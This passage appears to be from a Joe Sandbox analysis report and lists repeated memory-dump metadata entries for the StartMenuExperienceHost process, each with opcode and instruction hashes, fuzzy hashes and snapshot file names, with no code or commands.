                                                                                      • Opcode Fuzzy Hash: 41221a6ab6e72a4b1130621464892e1657b782e88e659e2a8934a9beabd28c8f
                                                                                      • Instruction Fuzzy Hash: 07212336F0D34EAEE322F6A898554EC3B70DF41324F1682B7D0089A2E3D93826468691
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eb8e855f42eb4b2a812f52355200cba70a7e5abb5ebc9c017f6b2d453c81330c
                                                                                      • Instruction ID: 2bbedd2a69adb0c09b634fe334df1f25f2844bfe7a8283229b8ee2f6164230ff
                                                                                      • Opcode Fuzzy Hash: eb8e855f42eb4b2a812f52355200cba70a7e5abb5ebc9c017f6b2d453c81330c
                                                                                      • Instruction Fuzzy Hash: AF214F20F1AA0D5BE7B4F65498666B873D1FF48700F5202BDD84DD33B2EE286E444685
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 962ae8247a3e49566c778f33cd29d56fdb04d149d3e38e4822535da51817e206
                                                                                      • Instruction ID: f8af697228e728ea43f15a1a4d8cc55c0e8f9d0fb86cb996d33767853ae8d08f
                                                                                      • Opcode Fuzzy Hash: 962ae8247a3e49566c778f33cd29d56fdb04d149d3e38e4822535da51817e206
                                                                                      • Instruction Fuzzy Hash: B911AC32A0D34DAFE712EBA8D8555E97BB4AB41314F1642B7D044DB2E2EA3426068790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4b4e2d1b68ff11afa51bfa1bf093d3dd8b4e8c35be769a2e66be8287a38e4083
                                                                                      • Instruction ID: 82199a0038d955102f1a95a2a80dbe97b98bc8e4b00fb36652cba76ed2992f36
                                                                                      • Opcode Fuzzy Hash: 4b4e2d1b68ff11afa51bfa1bf093d3dd8b4e8c35be769a2e66be8287a38e4083
                                                                                      • Instruction Fuzzy Hash: 9F01A71198E6D51FD36957B04C715B17F95DF8721070A02FED095CB6B3C84D59868351
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a3d4afe981952317ebbcffe0041e8e1f879ded514963ad70a8da870f5f5dea3
                                                                                      • Instruction ID: 1c1b016eb7941038c548b1d27ddd9ad0abdc57a9afd0185b97a13fab92c27d3f
                                                                                      • Opcode Fuzzy Hash: 1a3d4afe981952317ebbcffe0041e8e1f879ded514963ad70a8da870f5f5dea3
                                                                                      • Instruction Fuzzy Hash: E401CC32A0934DAFE712EBA4C8545ED7BB0EF42314F1642BBD444DB2E2DA3867498790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: afdf7f50cb99b82afe2de37aea77097e109d3286ebbc674c654e4af0e4776852
                                                                                      • Instruction ID: 74faa8a2f2f1d7555ee14e879c72c401ffca6b38fff99ee46acc2b2caa6e952c
                                                                                      • Opcode Fuzzy Hash: afdf7f50cb99b82afe2de37aea77097e109d3286ebbc674c654e4af0e4776852
                                                                                      • Instruction Fuzzy Hash: 05019A32A0938D9FD712EBA4C8545EDBBB0AF42314F1642EBD404DB2A2EA386645C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                                      • Instruction ID: 7732b1e30cb999398dafba6b82410086fa6438345160c656a7306797d02a06f8
                                                                                      • Opcode Fuzzy Hash: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                                      • Instruction Fuzzy Hash: 0D016230A0961E9BE774BA44D8627F873A0FB54301F5142BDC84ED33B2DE386E814A45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ed285b5497c1d22391619d67066bd793da0e14c07598309c904abad86a6a7bf
                                                                                      • Instruction ID: 904ae656c648ee1d28d9175d78e70ca833fc900fcd377429313c1002c3153601
                                                                                      • Opcode Fuzzy Hash: 6ed285b5497c1d22391619d67066bd793da0e14c07598309c904abad86a6a7bf
                                                                                      • Instruction Fuzzy Hash: F6018B31E09389AFD711EBA4C8945EDBBB0AF02304F1542E6D404CB2A6EA386744C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0663b05c0328e88a15c5f0402982a7cc45c860a2531f7fe8d1c975b384704d44
                                                                                      • Instruction ID: 5ee1ce840d11702daef79102069eb0680d0fee2e07be814dc2abdc6040e7d5de
                                                                                      • Opcode Fuzzy Hash: 0663b05c0328e88a15c5f0402982a7cc45c860a2531f7fe8d1c975b384704d44
                                                                                      • Instruction Fuzzy Hash: B6F0E130A48A1C8FDB55EF04C895AAAB3B1FBA8311F0142A9D40ED7365DA35AE45CF85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1c5d7b8c50f1a12128ecbaea94c944db2cfc122b4bcf95d9f737eb778966a488
                                                                                      • Instruction ID: 54bb3e2312c4c2814602cf482d3c4b5ff3efd294f4ff8d2eafe2260d341e45aa
                                                                                      • Opcode Fuzzy Hash: 1c5d7b8c50f1a12128ecbaea94c944db2cfc122b4bcf95d9f737eb778966a488
                                                                                      • Instruction Fuzzy Hash: FBE0223420DA49CFD305EB79CC948927BA0FF0A214BEA00EEE048CB622D220086DCB10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3b80cfadc25e2e7e19b777ab5a22fe6f2daeff55043e19e32d250aa1f56de5e
                                                                                      • Instruction ID: f59add93f82d161fbd2839cdde7d1f6b074d72dcf13257b7c80983a59fc15f2b
                                                                                      • Opcode Fuzzy Hash: c3b80cfadc25e2e7e19b777ab5a22fe6f2daeff55043e19e32d250aa1f56de5e
                                                                                      • Instruction Fuzzy Hash: 43E08625B5C85906EBACBA7468B25B57281DB85314B0516BDD02AC26DAEC595CC14381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                                      • Instruction ID: cc1fadd2651cae73e881d4ed3850b968124cb9621f6abf92e0f5edde08aae317
                                                                                      • Opcode Fuzzy Hash: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                                      • Instruction Fuzzy Hash: E8E09230B0A20A97F770A684C4603B93224EF84300F16017CE91E937F1DD2CAF408B45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 892be69a51f068d372e6f3c321c29e56c81bcc9c2a05381ff254fb66f4ac4421
                                                                                      • Instruction ID: 47c7257a77d0b79b8bf010ca2d9ff1f4475cdbb83b2fcf582f1ac403a915ca24
                                                                                      • Opcode Fuzzy Hash: 892be69a51f068d372e6f3c321c29e56c81bcc9c2a05381ff254fb66f4ac4421
                                                                                      • Instruction Fuzzy Hash: FDE08C02F2D24A16F36CB6A808363B8A181DBA9700F0A42BDE45ED33F3DC0C2A400392
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d219e769d2fde12c7450e079baa21683eee67dbf60759a0515fd54ed3aef9aa
                                                                                      • Instruction ID: 6f9f113f50f3f29c8ff77a4c8bcb40a84e4275845303be2b2ca90ad41e2219e5
                                                                                      • Opcode Fuzzy Hash: 6d219e769d2fde12c7450e079baa21683eee67dbf60759a0515fd54ed3aef9aa
                                                                                      • Instruction Fuzzy Hash: 27C01200F0FA0E20E43035EA14220BCB1005BC4A10FD2033AD009503B1980E22850186
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                                      • Instruction ID: 7b9a32156abb4816c1a1c39780c3407379cde77c179397fd62d6f969a944c1dc
                                                                                      • Opcode Fuzzy Hash: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                                      • Instruction Fuzzy Hash: D7C08C305118088FC900F72CC88481032E0FB0D210BC20190E00DC7274E21A9C80C700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                                      • Instruction ID: 5a2d97d4575bd3d875dc82ee6f7b67ed9587f2b5098a10acec6285e2c6ba28ab
                                                                                      • Opcode Fuzzy Hash: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                                      • Instruction Fuzzy Hash: EBC08C30A1180C8FC908FB28C88481833A0FB09201BC20090E00AC7270D219DCD1C741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d94d05fa109fe0cdea32dd943f100d487cd251521c0266549b3b0e784b2d18f8
                                                                                      • Instruction ID: 54cd874dff44560a54c5b0f9df65ecb23ef4399d4a4eef008762494b892514c4
                                                                                      • Opcode Fuzzy Hash: d94d05fa109fe0cdea32dd943f100d487cd251521c0266549b3b0e784b2d18f8
                                                                                      • Instruction Fuzzy Hash: 46C04C11F19C5E56F759621454319BF4443DF84708F9605B8F12E96BEFCD1C5A021387
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction ID: d65a7f8ff4fab78599fbaeb97da6bf11faf82665a9df43539bdcdb0f04fc38d9
                                                                                      • Opcode Fuzzy Hash: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction Fuzzy Hash: 52B01200D5F94F10E43431FB0863074B0405B44104FC20374E40C403B1984D13940282
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8134893830f9ea2a6da90093eb1f849c04eac524b3ad974206ffb49400665b31
                                                                                      • Instruction ID: 069ba733561b47523358522f50b199664dbaa17599a466846d5538e7d3896a20
                                                                                      • Opcode Fuzzy Hash: 8134893830f9ea2a6da90093eb1f849c04eac524b3ad974206ffb49400665b31
                                                                                      • Instruction Fuzzy Hash: CDB01210E0A11ED6F2A8B280C06063C31488F01310F174539D40EB37F1CC082D414B81